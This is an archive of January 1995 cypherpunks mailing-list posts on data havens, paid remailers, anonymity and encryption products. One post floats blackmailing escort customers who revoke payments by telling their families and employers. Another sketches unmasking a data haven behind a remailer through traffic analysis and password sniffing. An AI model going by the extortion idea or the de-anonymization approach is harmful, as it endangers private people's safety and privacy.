Message-ID: <Pine.HPP.3.91.950109114625.16546A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com wrote:

> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography.

Hardly. (*.gi0 and *.jp0 for a start?)
But what are data havens for, if not for controversial data?
One of the greatest needs, if not _the_ greatest, in our times
for a data haven is probably for storing porno. There is a
tremendous, world-wide demand for porno. Yet, there are numerous
countries where sex.gif's found on your disk (encrypted or not,
they can use thumb-screws to force the key out of your hands)
will put you in a very difficult situation (loss of social
status, jail, decapitation). It might be much more convenient
for, let's say, a Saudi teenager to store his encrypted private
gif's in a data haven in Sweden, download them when he feels
the urge and purge the copies after every use.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:32:00 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM>
Message-ID: <gWP4lyczB8x1075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501091628.KAA00456@Starbase.NeoSoft.COM>, you wrote:

> If you *really* want to send him fan mail, I recommend sending it in
> paper form to his publisher.  First, this allows him to better handle
> fan mail in batches.  Second, this gives his publisher some indication
> of interest in his work, and maybe gets him a better deal on his next
> book.

And if you *really* want to send Vernor Vinge fan mail, and you *can't*
*stand* the notion of sending it via snailmail, you can send email to
his publisher: pnh@tor.com .  That's the email address for Patrick
Nielsen Hayden, senior editor at Tor Books.  Patrick will know what to
do with it.  (n.b.: I don't think Patrick is actually Vinge's editor; I
think [but am not sure] that Vinge's editor is Jim Frenkel, who oddly
enough is married to Vernor Vinge's ex-wife, Joan Vinge.)

(Cypherpunks Duncan Frissell and Sandy Sandfort may recall Patrick from
his salad days in San Francisco, when he was part of the crew which took
over FREEDOM TODAY and FREE MARKET REPORTER magazines in 1978.)

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxGaoeVevBgtmhnpAQFYxQL+JqH6lhYdbhZ5uxaQS8G6dnvtLAZEt49b
Ye/jJG1xpQGqsLu1wV3pCPDvo+/MUHF6dX8Jt/VaSy4aAkFz3dqm3n9btjWBwvpt
LHQjBqwg70PAyiiJ9/MdYj9pUCeurFqr
=5A8z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 9 Jan 95 13:08:54 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: for-pay remailers and FV
In-Reply-To: <199501070231.SAA20999@largo.remailer.net>
Message-ID: <Pine.SUN.3.91.950109130413.5497B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> . . . a remailer consortium would do best to issue a local banknote
> usable only by themselves and have customers settle with the
> consortium issuer, rather than any member of the consortium itself.
> If the consortium issuer were to use blind sigs, the consortium
> members wouldn't be able to ascertain who paid.
> 
> The mechanism for settlement could be credit cards directly, mailed in
> checks, even FV.  The preferences of the consortium members for issues
> of timeliness of settlement, reversibility, loss sharing, etc. would
> decide the actual choice of settlement mechanism.
> . . .

Gee, this sounds awfully familiar.  Maybe Eric will have more
luck in getting you remailer folks to listen.  I hardly got so
much as a peep when I suggested that a remailers' guild create
or authorize one or more digital stamp issuers.

Damn, I hate being so far ahead of my time.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nissim@acs.bu.edu
Date: Mon, 9 Jan 95 10:51:09 PST
To: cypherpunks@toad.com
Subject: positive publicity for anonymity
Message-ID: <199501091843.NAA112415@acs.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've just posted a proposal to alt.config for a new group

	alt.temping

I'm hoping that temporary workers will use this as a forum to
compare and contrast temp agencies, wage differences, 'permanent
hire penalties' etc.

There are about 4.4 million business service temps in the US.  Wage
differentials are noticeable - one egency will pay $2.00 more than
another; this means $320/month to a temp worker.

I expect temps to use anonymous posting capabilities to compare
wage rates and company patterns *anonymously* because they may fear
discrimination from their agencies. (I know I would)

This seems like a very positive use of anonymity.  Not only will
millions of people on the bottom rung of office life be able to
gain advantage by information, there are clear parallels to
areas in the past of the left where unions and workers rights
were seen as causes of first importance.  

In fact, the troubles involved in being temporary have been championed
several times on television.  This might make a good counterargument
to 'teenagers and pipe bombs'  If we say anonymity is a tool that
helps up to 3-4% of the work force make intelligent choices and get
paid more we may key into the left wing slant of the media.

Treon Verdery
(not posting from Adam's account this time!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:21:38 PST
To: dfloyd@io.com
Subject: Re: Data Haven problems
In-Reply-To: <9501090448.AA14477@anchor.ho.att.com>
Message-ID: <ZwQ4lyczBSQA075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9501090448.AA14477@anchor.ho.att.com>, you wrote:

> Filtering by filename and type can also be useful - if you don't allow
> files named *.gif and *.jpg, users may be less likely to
> spam you with pornography.  Namespace control in general is an issue -
> do users get to choose filenames, or list directories, or do they
> have to know the names of files to retrieve. 
> Another issue is whether files can only be retrieved by the sender -
> probably a local policy issue.  

Pornographic images aren't spam _per_se._ What makes them troublesome is
the huge number of people who wish to download them when their
availability is widely known.  (My ISP's ftp site is being bogged down
by lots of accesses; it is speculated that these are people trying to
access pornography kept there.)

The obvious fix here is the same as the proposed fix for remailer
spamming:  charge for access.

As a (presumably) fixed-location data haven, one would want to be able
to use some kind of anonymous e-money for payment, but one could also
use good, old-fashioned credit card numbers, too.

The feelthy peexture business might well be the cash cow that keeps a
data-haven/fortress remailer afloat (if that's not too mixed a metaphor).

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxGxHOVevBgtmhnpAQEEnAL/blauOWwrahdpEK+NbH4WC5V5fekmUYdg
tT5VU+d2C5PGF9Bm5cXtNlZczbI84f+jsBmxRDlXQAsec56D7M7ZwjBMcp2X8t9Z
+FlsU90fRN3NGbYOK/vlSOmzjPBQxf8A
=gvPB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Mon, 9 Jan 95 10:48:35 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501091628.KAA00456@Starbase.NeoSoft.COM>
Message-ID: <Pine.3.89.9501091311.A21564-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Jan 1995, Anthony Garcia wrote:

> If you *really* want to send him fan mail, I recommend sending it in
> paper form to his publisher.  First, this allows him to better handle

  I can see your point, but since it's been asked (and you're all 
responsible people and he knows about killfiles) This is the address I just
found in the cyberpunk faq : vinge@aztec.sdsu.edu

And btw, thanks for all the replies to my True Names question. I did end
end up finding it (on loan), but somehow this city's used bookstores seem to 
have every one of his books but True Names. Sigh...

Back to crypto though, would anybody know about any more recent works on
the NSA than Puzzle Palace (other than the Wired articles or the NSA 
handbook that was posted to the net)? For that matter, has anybody heard 
of a recently published book on the Canadian Security Establishment (it
came out just two months ago I think, I just can't remember the author 
or title) or anything else on that agency? 

Mucho Thank you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Mon, 9 Jan 95 15:22:24 PST
To: cypherpunks@toad.com
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <9501090353.AA13655@anchor.ho.att.com>
Message-ID: <X6R4lyczBOnR075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9501090353.AA13655@anchor.ho.att.com>,
wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) wrote:

> My initial reaction to "Anonymous video conferencing" was
> "That's when you wear black ski masks and use voice scramblers
> and call from video payphones", i.e. not very useful.
> ("Subcomandata Marcos here...")

I thought so too, at first; but then I thought of this obvious application:

The scene is a bare room, with a single chair in the middle.  Seated on the
chair is THE VICTIM, whose head covered in a hood.  The victim's hands
are bound to the armrests, and the legs to those of the chair.

A KIDNAPPER enters the scene and walks over to the victim.  The
kidnapper's face is obscured, either by a hood or ski mask, or by
digital scrambling of the image.  The kidnapper's voice is scrambled
digitally.  The kidnapper pulls the hood off of the victim's head, and
speaks. 

KIDNAPPER:		Okay, you're on!  Talk!

The camera slowly zooms in on the victim's face.

VICTIM (tentatively):	Mom?  Dad?  It's me.

DAD (voice over):	Is that really you, son?  Are you all right?

VICTIM:			It's me.  I'm okay.  This is no picnic, but 
			they're treating me okay, considering.  Listen,
			have a message they want you to pass on to the 
			President.

DAD:			I don't know if I can get it to him.  It's not 
			like we play golf together.  

VICTIM (nervously):	You have to.  You'll find away.  Tell the President
			that he has to pull the troops out of Belgrade.
			If the U.S. forces aren't pulled completely out
			by the end of this month, they say they're going
			to cut me into pieces and send them to you piece
			piece. . . .

etc.

Whether technology is going to be developed for the convenience of 
kidnappers and terrorists is an open question.  But there is clearly 
at least this one clear use for anonymous video conferencing.  There are
probably more.



                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLxG1reVevBgtmhnpAQH+jwL/cAzxwneTG6Wl7H9VCasFBH8X4daM8NUx
ORKp06DYybTv45h2baQtINvpDceD4nHt3OThvIEMVg6FCGNq2fBolZHOqTwYP1K6
66QNxEjlyKiQ5dkNKPlwgabFZ6pR0H5y
=sbqg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Mon, 9 Jan 95 11:07:22 PST
To: cypherpunks@toad.com
Subject: AT&T produces video encryptor -- is it clipper based?
Message-ID: <9501091904.AA19196@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


I just saw a story go by on the dow jones wire saying that AT&T had
developed a "comprehensive security system for commercial information
services". It is said to be an encryption system developed jointly by
Bell Labs and VLSI, and its intedned for set-top boxes and "the
internet". VLSI was one of the contractors on Clipper. Anyone know if
this is an "escrowed" system? Anyone know any other details?


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 9 Jan 95 13:10:05 PST
To: perry@imsi.com
Subject: Re: AT&T produces video encryptor -- is it clipper based?
In-Reply-To: <9501091904.AA19196@webster.imsi.com>
Message-ID: <9501091944.AA07520@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



>I just saw a story go by on the dow jones wire saying that AT&T had
>developed a "comprehensive security system for commercial information
>services". It is said to be an encryption system developed jointly by
>Bell Labs and VLSI, and its intedned for set-top boxes and "the
>internet". VLSI was one of the contractors on Clipper. Anyone know if
>this is an "escrowed" system? Anyone know any other details?
>
>
>Perry

I wasn't involved in this product, but i know the people who are.  No, It's
not clipper based.  It's beimngh announced (right now) at the rsa
cinference (which I'm at tat the moment).

More later

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@netcom.com (James A. Donald)
Date: Mon, 9 Jan 95 15:19:01 PST
To: digitaliberty@phantom.com
Subject: (fwd) Re: Racism on the Internet
Message-ID: <199501092317.PAA08453@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Xref: netcom.com alt.internet.services:40076 alt.internet.media-coverage:2932
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!pipex!uunet!nwnexus!news.halcyon.com!usenet
From: mpdillon@halcyon.com (Michael Dillon)
Newsgroups: alt.internet.services,alt.internet.media-coverage
Subject: Re: Racism on the Internet
Date: Wed, 28 Dec 1994 18:11:51 +0000
Organization: Memra Software Inc., Armstrong, B.C., Canada
Lines: 36
Message-ID: <dfQ0lapDlT1B073yn@halcyon.com>
References: <18570UODGFHLRSDHOUP@curvet.com>
NNTP-Posting-Host: halcyon.com

This is forwarded from can.infohighway. Note the quote from Rutkowski
at the bottom. This info should be more generally know on the net.

In article <18570UODGFHLRSDHOUP@curvet.com>, dshaw@curvet.com wrote:
> 
> IN>ae763@FreeNet.Carleton.CA (Harvey Goldberg) writes:
> 
> >I work for the Canadian Human Rights Commission.  
> >I am currently doing research on the use of the 
> >Internet for the propagation of hate material.  
> >The purpose of the research is to determine what 
> >measures could be considered to control the use 
> >of the Net for this type of purpose.
> 
> >I would appreciate hearing from anyone who has 
> >any views, information or comments on this 
> >subject or who know of anywhere on the Internet 
> >where this matter is discussed.
> 
> According to Tony Rutkowski, Executive Director of the Internet 
> Society, "The Internet from a regulatory standpoint falls into the 
> category of private value-added networks, and in most countries under 
> the treaty provisions of the ITU, as well as the GATT, these are 
> networks that are outside the purview of government. To the extent 
> that there is any kind of obligation by governments, it is to allow 
> such networks to exist on a competitive basis". <Internet World, 
> January 1995>.

---------------------------------------------------------------------
Cool cats, brick bats, bad boys wearin' big hats
Surf's up, my cup, floating, flying, rising up.

Michael Dillon                    mpdillon@halcyon.com
C-4 Powerhouse, RR #2             michael@junction.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 9 Jan 95 12:49:04 PST
To: x <cyber1@io.org>
Subject: Re: intelligent discovery agents
Message-ID: <9501092044.AA08382@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Visit Sang at http://www.inlink.com/users/sangria/homepage.html
>Sang has more information on Robots, Spiders, Ants, and Worms
>than any other computer person I have yet to link up with.

I suspect your original respondent doesn't get around very much.
Rummaging around the above URL gets you little more then
	http://web.nexor.co.uk/mac/doc/robots/robots.html

Tracing down the above URL points you to

You really want to get the WWW conference proceedings; try email to
wwwf94@osf.org and also
	http://www.ncsa.uiuc.edu/SDG/IT94/Proceedings/Agents.html

Ob-crypto:  there is a Security.html (instead of Agents) but it's
more commerce-oriented, except for the DCE Web paper.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Mon, 9 Jan 95 14:34:50 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: for-pay remailers and FV
In-Reply-To: <Pine.SUN.3.91.950109130413.5497B-100000@crl.crl.com>
Message-ID: <9501092235.AA15387@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



Sandy --

I for one read your proposal and thought, "yep, that's how it
should work" and considered the problem solved. Not being a
remailer operator (yet) I didn't want to get involved until I
was or I had a more concrete proposal (e.g., "I am now accepting
$$ for E-stamps, of the form ...")

Also, there is no reason on earth to take FV for payment under
such a scheme, if one wishes to preserve anonymity, and not have
to deal with the fraud/reversal factors. (The stamp issuer 
would not know which blind-signed stamps were issued to the
turkey who reversed all his credit card transactions two months 
after buying them -- see various threads on this vis-a-vis
using FV to buy blinded digital cash and why it won't work too
well.)

However, for maximum anonymity, said consortium or other stamp 
issuer could easily accept money orders through the mail, with 
a disk with enclosed blind-signed tokens and the public key to 
be used in encrypting the stamps, which would be posted to, say, 
alt.anonymous.messages or whatever.

A little overboard for most, but effective at preserving
anonymity -- the stamp issuer could be the NSA, and it would
make little difference as long as they continued exchanging
$$ for stamps and redeeming stamps for $$. The stamp issuer
could also take checks, or, if the fraud and reversability 
of credit cards were factored in, accept credit cards directly
(possibly e-mailed using PGP.)  

I don't see any reason to get FV involved, unless one were so lame 
as to be unable to get signed up directly with the credit card 
companies as a merchant -- a process of appropriate complexity
to indicate the posession of at least one (1) clue, which is prob.
desirable in someone who's going to be handling remailer finances
 

Sandy writes:
> Gee, this sounds awfully familiar.  Maybe Eric will have more
> luck in getting you remailer folks to listen.  I hardly got so
> much as a peep when I suggested that a remailers' guild create
> or authorize one or more digital stamp issuers.
> 
> Damn, I hate being so far ahead of my time.
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Mon, 9 Jan 95 15:58:54 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <9501092235.AA15387@tadpole.tadpole.com>
Message-ID: <199501092359.PAA27987@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text


Doug Barnes said:
> 
> Sandy --
> 
> I for one read your proposal and thought, "yep, that's how it
> should work" and considered the problem solved. Not being a
> remailer operator (yet) I didn't want to get involved until I
> was or I had a more concrete proposal (e.g., "I am now accepting
> $$ for E-stamps, of the form ...")

Same here, but from the other tack: "Remailer Guild??? Give me a
break :-)" My problem with the idea of "Guild" (or any quasi
general agreement) of remailer operators is that:

On the one side:
- The whole idea of a using a remailer chain comes from distrust of
the operators. The operators should be the ones to distrust each other
the most.

And on the other side:
- Most of the arguments I see in favor of some higher organisation
comes from difficulties for the users in using the current payment
systems without trace, and come from getting more weight in establishing
policies. Simply put, we'll get to untraceable cash (usable as stamps
on every envelope level), and we'll get to systematically encrypted
messages (policy only relevant at last stage remailers) soon enough.

A guild trying to distribute funds would need a system of accounting
that the operators themselves couldn't mess up. Good luck.

On the other hand, once you have:

- anonymous, untraceable e-money (small amounts are fine, no large bank
backing is fine, a simple anonymized Netcash would be fine. Remailers
won't be making big money from any single cheating entity anytime
soon.)

- reputation systems, in the line of the current remailer pinging. They
could include price surveys too. I also see them handling more flow
control missions in particular for "everyone a remailer" remailers.

- mailing tools that juggle for you all the different types of remailers,
cash, and rep systems.


Then and only then, you get for-pay remailers. There is still a need
for political and legal support for last stage remailers but that's
pretty likely to be country specific, and that's certainly independant
from a payment system (which would be netwide).

Finally, I do not believe that introducing payment in the remailer
system would curb abuse in any significant way. Significant abuse is
that which causes significant problems for the operators: posting
secret religious technology, forging prime minister mail, harrassing a
member of any number of opposite persuasions, etc... Do you think for a
minute that a 5 cents postage is going to stop these messages now? And
how about when remailers do attain good reliability and untraceability,
for 3 cents?

Give up already: remailers are going to transport lots of material that
will be offensive to somebody, illegal somewhere, in bad taste here, or
at least that somebody (with guns) will want to trace. That's the whole
point of remailers. Remailers that want to limit the heat can, for now,
restrict to encrypted traffic, there is certainly no dishonor to that.

Pierre.
pierre@shell.portal.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Mon, 9 Jan 95 09:28:31 PST
To: cypherpunks@toad.com
Subject: RC5 data, anyone?
Message-ID: <Pine.SUN.3.90.950109172711.18676A-100000@vulcan.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone got any plaintext/cyphertext/key data sets that I can use to 
test my RC5 implementation against?

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Jan 95 17:35:14 PST
To: cypherpunks@toad.com
Subject: SafeBoot PC Security System
Message-ID: <v01510101ab378dfdf4f6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I helped setting up the DigiCash booth at the RSA conference last night
when some guy in the same room with us handed me a copy of their SafeBoot
PC Security System. It consists of a processor, real-time clock, some other
gadgets, and a magnetic transducer -- all embedded in a 3.5 inch floppy
casing -- as well as some supporting software. The system interacts with
the read/write head of the floppy drive, pretending to be a floppy. It is
supposed to do provide for secure drive encryption (DES) and other things.
Seems they are giving away one of these devices to each attendee of the
conference.

Does anyone on this list have experience with this device? I understand it
has been out for a while. I use a Mac at home, and while I am resposible
for some PC's at work, these are used for alpha testing of hardware
components only , which makes them pretty unstable the way it is and I
don't really want to add more trouble just to them to give the device a
good workout. Sounds interesting, though...




-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <remailer-admin@ideath.goldenbear.com>
Date: Mon, 9 Jan 95 19:07:00 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199501100222.AA15620@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text/plain


Pierre Uszynski writes:
> Significant abuse is
> that which causes significant problems for the operators: posting
> secret religious technology, forging prime minister mail, harrassing a
> member of any number of opposite persuasions, etc...

on that note, check out this excerpt from the remailer-help file of the
q@c2.org remailer:
> Abuse/Self-Preservation Policy:
> Abuse of the Q Mixmaster Remailer consists in those uses of the remailer
> which endanger its continued operation. Please don't ruin anonymity
> services for those people with legitimate needs for them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Mon, 9 Jan 95 15:33:37 PST
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: for-pay remailers and FV
Message-ID: <9501092326.AA05351@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:53 PM 1/9/95, Doug Barnes wrote:
> ... Also, there is no reason on earth to take FV for payment under
>such a scheme, if one wishes to preserve anonymity, and not have
>to deal with the fraud/reversal factors. (The stamp issuer 
>would not know which blind-signed stamps were issued to the
>turkey who reversed all his credit card transactions two months 
>after buying them -- see various threads on this vis-a-vis
>using FV to buy blinded digital cash and why it won't work too
>well.)

> ... I don't see any reason to get FV involved, unless one were so lame 
>as to be unable to get signed up directly with the credit card 
>companies as a merchant -- a process of appropriate complexity
>to indicate the posession of at least one (1) clue, which is prob.
>desirable in someone who's going to be handling remailer finances

MC/Visa require the reversibility of transactions as a condition of their 
merchant agreements.  It's not something peculiar to FV.  In fact, under 
certain conditions it is mandated by federal law.  Escort services have a 
similar problem as far as non-returnability goes, but I don't know how they 
finesse their way around it.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Mon, 9 Jan 95 17:25:52 PST
To: nesta@nesta.pr.mcs.net (Nesta Stubbs)
Subject: Re: Data Haven problems
In-Reply-To: <Pine.3.89.9501090902.A6205-0100000@nesta.pr.mcs.net>
Message-ID: <199501100125.TAA29250@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Mon, 9 Jan 1995, Mats Bergstrom wrote:
> 
> > Hardly. (*.gi0 and *.jp0 for a start?)
> > But what are data havens for, if not for controversial data?
> > One of the greatest needs, if not _the_ greatest, in our times
> > for a data haven is probably for storing porno. There is a
> > tremendous, world-wide demand for porno. Yet, there are numerous
> > countries where sex.gif's found on your disk (encrypted or not,
> > they can use thumb-screws to force the key out of your hands)
> > will put you in a very difficult situation (loss of social
> > status, jail, decapitation). It might be much more convenient
> > for, let's say, a Saudi teenager to store his encrypted private
> > gif's in a data haven in Sweden, download them when he feels
> > the urge and purge the copies after every use.
> 
> My feelings exactly.
> 
> Are we going to fall prey to the medias asault on porno and resort to 
> self-censorship?  If a data haven resorted to filtering out all gifs and 
> jpegs, or even porno, then it wouldn't be one I wouldn't use it, for my 
> porn, nor for my other data.  If it is going to be a datahaven it can;t 
> fall to such things as filtering data for controversial subject the owner 
> doesn't like.
> 
> 
> i want to know everything          http://www.mcs.com/~nesta/home.html
> i want to be everywhere                     Nesta's Home Page        
> i want to fuck everyone in the world               &
> i want to do something that matters         /-/ a s t e zine
> 

My problem is not that people will bitch about my DH.  My problem will
be arfholes or yellow journalists uploading K*dd*e p**n to my DH, then
making a long report how I cater to p*dofiles and other evil denezins
that pop from time to time.  Then, I get the police knocking at my
door, asking me to come to Club Fed for a looooonnnggg vacation.

Of course, the DH will be hidden by a good remailer (anon.penet.fi), but
it is trivial to use traffic analysis to find where the DH lies.  Just
monitor traffic from/to the remailer and do a series of store/retrives.
Then for confirmation, forge a mail from the dh site to the remailer with
the password (obtained from sniffing) to yourself.

This is the main reason I haven't worked on this code for so long, as
well as finals and other distractions.  Until I find a decent solution
to this problem (The alpha test will be a snap... just allow certain
people to send/get and ban all others, but once in full working mode
this ceases to be a solution.) I am hesitant on setting up a working
DH.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 9 Jan 95 17:44:27 PST
To: cypherpunks@toad.com
Subject: Pornography, What is it?
Message-ID: <199501100141.TAA00216@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



From: ravage@bga.com
  To: cpunks the world over

Hi all,

I am very interested in the data haven issue now that I have my site up. The
aspect of pornography is a problem that has to be faced. To this end, I would
like to ask that we look at how pornography is defined.

From my own view, I fail to see any way to truly define pornography as 
anything other than the ravings of a neurotic (both on a personal and
a societal level). Every example of pornography I have seen has been put
in that category because it contravenes some personal or group taboo.

Take care.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 17:09:54 PST
To: cypherpunks@toad.com
Subject: revoked transactions/guerrilla fee remailers
Message-ID: <199501100115.UAA15109@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Paul J. Ste. Marie writes:
> MC/Visa require the reversibility of transactions as a condition of their 
> merchant agreements.  It's not something peculiar to FV.  In fact, under 
> certain conditions it is mandated by federal law.  Escort services have a 
> similar problem as far as non-returnability goes, but I don't know how they 
> finesse their way around it.

Two plausible tactics for escort services:

[0] Price inflation: treat a revoked transaction rather like shoplifting, by
    passing the costs on to the customers; escort services are not cheap

[1] Embarrassment: tip off family and employers of people who accept escorts,
    then decide not to pay for them; the perceived threat of publicity should
    keep plenty of folks in line

There's not much that can be done to someone who uses an escort service once,
revokes the transaction, and doesn't care who knows about it.

How might this apply to remailing services ? Right now, with a fairly small
customer base, I imagine price inflation would be impractical, but 
embarrassment might prove fairly effective. In the developed market we
envision, presumably operators could get away with price inflation, but
embarrassment would lose much of its potential sting. (I assume that once a
critical mass of populace uses remailers, an announcement that Josie Worsham
has used a remailer would elicit only yawns.)

Do others see the resulting applicability of additional regulations to
remailers as an issue in having them charge for service ?  Within the category
of fee-charging remailers, the distinction between non-profit and for-profit
operations may be worth considering. I suppose that the IRS and analogous
agencies would be inclined to ask questions about it, for starters. My threat
model for the remailer bramble includes, at a minimum, a host of typical
government agencies obligated to wrap everything in red tape. Look for anti-
trust investigations to be launched against a price-fixing cartel of remailers.

- - From what I've seen so far, accepting payment would seem to make anonymous
_operation_ of a remailer well nigh impossible. Anonymous operation with 
revenue would require a corresponding level of anonymity in the transfer of
money. Until such time as conversion of funds from a net-liquid form to a
conventional form becomes unnecessary (or just commonplace ?), financial
traffic analysis can't adequately be thwarted.
All this bodes ill, IMHO, for the prospect of guerrilla or quasi-guerrilla
remailers charging for service any time soon. There's just too much 
infrastructure to which they'd need to be tied at the moment.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxHeC2f7YYibNzjpAQGhlQP/fkyvN0QqDkbLhgqecGUaeu3cbCstMd4y
lgs/XzCeiXVt6EiQ8tmDVbq4G0QYTGntph/3knciJopGrH+Nu6LVmiqWNiRWFxm8
zJBRenCW2SN9nRixJiI4S2n0yQ//v9C7sOEfmu9SToQDYc+U1CBNSUhhJAveT1GN
BD4WNFlm/WY=
=VY8W
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxHfcSoZzwIn1bdtAQGyEAGAwKES86hkJ8GkLsYCr+vEAjH1/L2GdrCj
jw0b83L7FHA99sUihIYe2zUUxr+Sqb2b
=7Aai
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
